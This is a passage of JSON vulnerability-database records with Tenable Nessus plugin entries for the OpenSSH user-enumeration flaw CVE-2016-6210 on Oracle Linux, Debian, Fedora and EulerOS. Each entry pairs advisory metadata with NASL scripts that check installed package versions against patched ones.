"AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "Oracle Linux 6 : openssh (ELSA-2017-2563)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-01T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:openssh", "p-cpe:/a:oracle:linux:openssh-server", "p-cpe:/a:oracle:linux:openssh-askpass", "p-cpe:/a:oracle:linux:openssh-ldap", "p-cpe:/a:oracle:linux:openssh-clients", "p-cpe:/a:oracle:linux:pam_ssh_agent_auth"], "id": "ORACLELINUX_ELSA-2017-2563.NASL", "href": "https://www.tenable.com/plugins/nessus/102904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2563 and \n# Oracle Linux Security Advisory ELSA-2017-2563 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102904);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"RHSA\", value:\"2017:2563\");\n\n script_name(english:\"Oracle Linux 6 : openssh (ELSA-2017-2563)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2563 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007169.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"pam_ssh_agent_auth-0.9.3-123.el6_9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-clients / openssh-ldap / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:43:56", "description": "OpenSSH secure shell client and server had a user enumeration problem\nreported.\n\nCVE-2016-6210\n\nUser enumeration via covert timing channel\n\nFor Debian 7 'Wheezy', this problem has been fixed in version\n6.0p1-4+deb7u5.\n\nWe recommend that you upgrade your openssh packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 19, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-08-01T00:00:00", "title": "Debian DLA-578-1 : openssh security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2016-08-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssh-client", "p-cpe:/a:debian:debian_linux:ssh-krb5", "p-cpe:/a:debian:debian_linux:ssh", "p-cpe:/a:debian:debian_linux:openssh-client-udeb", "p-cpe:/a:debian:debian_linux:openssh-server-udeb", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:openssh-server", "p-cpe:/a:debian:debian_linux:ssh-askpass-gnome"], "id": "DEBIAN_DLA-578.NASL", "href": "https://www.tenable.com/plugins/nessus/92641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-578-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92641);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6210\");\n\n script_name(english:\"Debian DLA-578-1 : openssh security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"OpenSSH secure shell client and server had a user enumeration problem\nreported.\n\nCVE-2016-6210\n\nUser enumeration via covert timing channel\n\nFor Debian 7 'Wheezy', this problem has been fixed in version\n6.0p1-4+deb7u5.\n\nWe recommend that you upgrade your openssh packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/07/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/openssh\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-client-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-server-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ssh-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"openssh-client\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssh-client-udeb\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssh-server\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssh-server-udeb\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ssh\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ssh-askpass-gnome\", reference:\"6.0p1-4+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ssh-krb5\", reference:\"6.0p1-4+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:14:23", "description": "Security fix for CVE-2016-6210\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-07-21T00:00:00", "title": "Fedora 24 : openssh (2016-7440fa5ce2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssh", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-7440FA5CE2.NASL", "href": "https://www.tenable.com/plugins/nessus/92476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-7440fa5ce2.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92476);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"FEDORA\", value:\"2016-7440fa5ce2\");\n\n script_name(english:\"Fedora 24 : openssh (2016-7440fa5ce2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-6210\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-7440fa5ce2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"openssh-7.2p2-10.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T08:52:27", "description": "According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-08T00:00:00", "title": "EulerOS 2.0 SP1 : openssh (EulerOS-SA-2017-1189)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:openssh-askpass", "p-cpe:/a:huawei:euleros:openssh-clients", "p-cpe:/a:huawei:euleros:openssh-keycat", "p-cpe:/a:huawei:euleros:openssh-server", "p-cpe:/a:huawei:euleros:openssh", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1189.NASL", "href": "https://www.tenable.com/plugins/nessus/103027", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103027);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-6210\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : openssh (EulerOS-SA-2017-1189)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1189\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7edce972\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssh package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"openssh-6.6.1p1-28.h13\",\n \"openssh-askpass-6.6.1p1-28.h13\",\n \"openssh-clients-6.6.1p1-28.h13\",\n \"openssh-keycat-6.6.1p1-28.h13\",\n \"openssh-server-6.6.1p1-28.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T08:52:27", "description": "According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-08T00:00:00", "title": "EulerOS 2.0 SP2 : openssh (EulerOS-SA-2017-1190)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:openssh-askpass", "p-cpe:/a:huawei:euleros:openssh-clients", "p-cpe:/a:huawei:euleros:openssh-keycat", "p-cpe:/a:huawei:euleros:openssh-server", "p-cpe:/a:huawei:euleros:openssh", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/103028", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103028);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-6210\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : openssh (EulerOS-SA-2017-1190)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1190\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf37839d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssh package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") 